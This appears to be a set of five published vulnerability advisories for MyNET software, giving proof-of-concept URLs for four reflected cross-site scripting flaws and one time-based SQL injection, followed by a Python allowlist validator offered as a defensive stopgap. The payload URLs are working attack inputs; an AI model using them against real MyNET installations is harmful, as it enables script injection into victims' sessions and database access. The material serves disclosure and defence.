# Exploit Title: MyNET <= 26.05 - Reflected Cross Site Script via msg parameter
# Date: 22/12/2025
# Exploit Author: Miguel Santareno and André Monteiro
# Vendor Homepage: https://www.airc.pt/
# Software Link: https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN
# Version: <= V.2022.837.002a
# Tested on: Google and Firefox latest version
# CVE : CVE-2024-25814

# 1. Description

Unauthenticated users can inject HTML and scripts into the msg parameter on MyNET <= 26.05 since the msg parameter is unsanitized.

# 2. Proof of Concept (PoC)

To successfully exploit this attack, an attacker needs to send the following link to the victim with the payload:

https://example.com/?msg='-[location='Javascript:confirm`1`']-'

<---------------------------------------------------------------------------------------------------------------->

# Exploit Title: MyNET <= 26.05 - Reflected Cross Site Script via src parameter
# Date: 22/12/2025
# Exploit Author: Miguel Santareno and André Monteiro
# Vendor Homepage: https://www.airc.pt/
# Software Link: https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN
# Version: <= V.2022.837.002a
# Tested on: Google and Firefox latest version
# CVE : CVE-2024-25812

# 1. Description

Unauthenticated users can inject HTML and scripts into the src parameter on MyNET <= 26.05 since msg parameter is unsanitized.

# 2. Proof of Concept (PoC)

To successfully exploit this attack, an attacker needs to send the following link to the victim with the payload:

https://example.com/?src="Style="position:fixed;top:0;left:0;font-size:999px;"OnPointerEnter="(confirm)(document.domain)"

<---------------------------------------------------------------------------------------------------------------->

# Exploit Title: MyNET <= 26.08 - Reflected Cross Site Script via ficheiro parameter
# Date: 22/12/2025
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://www.airc.pt/
# Software Link: https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN
# Version: <= V.2022.837.002a
# Tested on: Google and Firefox latest version
# CVE : CVE-2024-35322

# 1. Description

Unauthenticated users can inject HTML and scripts into the ficheiro parameter on MyNET <= 26.08 since the ficheiro parameter is unsanitized.

# 2. Proof of Concept (PoC)

To successfully exploit this attack, an attacker needs to send the following link to the victim with the payload:

https://example.com/MyNetJSON.asp?acc=4&ficheiro=%3Cimg%20src=a%20onerror=alert(document.domain)%3E&formtoken=1234566&_tk=

<---------------------------------------------------------------------------------------------------------------->

# Exploit Title: MyNET <= 26.08 - Reflected Cross Site Script HTTP Parameter pollution
# Date: 22/12/2025
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://www.airc.pt/
# Software Link: https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN
# Version: <= V.2022.837.002a
# Tested on: Google and Firefox latest version
# CVE : CVE-2024-40317

# 1. Description

Unauthenticated users can inject HTML and scripts into parameters, resulting in parameter pollution on MyNET <= 26.08, since parameters are unsanitized.

# 2. Proof of Concept (PoC)

To successfully exploit this attack, an attacker needs to send the following link to the victim with the payload:

https://example.com/MyNetFormBD.asp?formato=int_registar&intmenu=1132&semuser=1&primeirachamada=1&le1wu'-alert(1)-'ivxas=1

<---------------------------------------------------------------------------------------------------------------->

# Exploit Title: MyNET <= 26.08.316 - Unauthenticated SQL Injection
# Date: 22/12/2025
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://www.airc.pt/
# Software Link: https://www.airc.pt/solucoes-servicos/solucoes?segment=MYN
# Version: <= V.2022.837.002a
# Tested on: Google and Firefox latest version
# CVE : CVE-2024-39037

# 1. Description

Unauthenticated users can inject SQL into intmenu parameter pollution on MyNET <= 26.08.316 since the intmenu parameter is unsanitized.

# 2. Proof of Concept (PoC)

To successfully exploit this attack, an attacker needs to send the following link to the victim with the payload:

https://example.com/MyNetFormBD.asp?formato=int_registar&intmenu=1132%3bSELECT+PG_SLEEP(10)--&semuser=1&primeirachamada=1
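
All five advisories above share one root cause, request parameters accepted without validation. The following is an added example, not code from the advisory authors or the vendor: a strict allowlist check on query strings that could sit in a reverse proxy as a stopgap until the application itself encodes output and uses parameterized queries. The per-parameter patterns and the function name `check_request` are assumptions inferred only from the benign-looking values in the PoC URLs.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed value rules per parameter (hypothetical; derive real ones from the app).
RULES = {
    "acc": re.compile(r"\d{1,4}"),
    "intmenu": re.compile(r"\d{1,6}"),
    "semuser": re.compile(r"[01]"),
    "primeirachamada": re.compile(r"[01]"),
    "formato": re.compile(r"[A-Za-z0-9_]{1,64}"),
    "formtoken": re.compile(r"[A-Za-z0-9]{1,64}"),
    "_tk": re.compile(r"[A-Za-z0-9]{0,64}"),
    "ficheiro": re.compile(r"[A-Za-z0-9_.-]{1,128}"),
    "msg": re.compile(r"[\w .,!?-]{0,200}"),
    "src": re.compile(r"[A-Za-z0-9_./-]{1,200}"),
}
# Parameter names are validated too: one PoC carries its payload in the name.
NAME_OK = re.compile(r"[A-Za-z0-9_]{1,64}")


def check_request(url):
    """Return a list of (parameter, reason) findings; an empty list means accept."""
    findings, seen = [], set()
    query = urlsplit(url).query
    # parse_qsl percent-decodes, so rules apply to what the application would see.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not NAME_OK.fullmatch(name):
            findings.append((name, "parameter name has unexpected characters"))
            continue
        if name in seen:
            findings.append((name, "duplicate parameter"))
        seen.add(name)
        rule = RULES.get(name)
        if rule is None:
            findings.append((name, "unknown parameter"))
        elif not rule.fullmatch(value):
            findings.append((name, "value fails allowlist"))
    return findings


if __name__ == "__main__":
    base = "https://example.com/MyNetFormBD.asp?formato=int_registar&intmenu="
    samples = (
        base + "1132&semuser=1&primeirachamada=1",  # constructed benign request
        base + "1132%3bSELECT+PG_SLEEP(10)--&semuser=1&primeirachamada=1",  # PoC URL from the page
    )
    for u in samples:
        print(check_request(u) or "accept")
```
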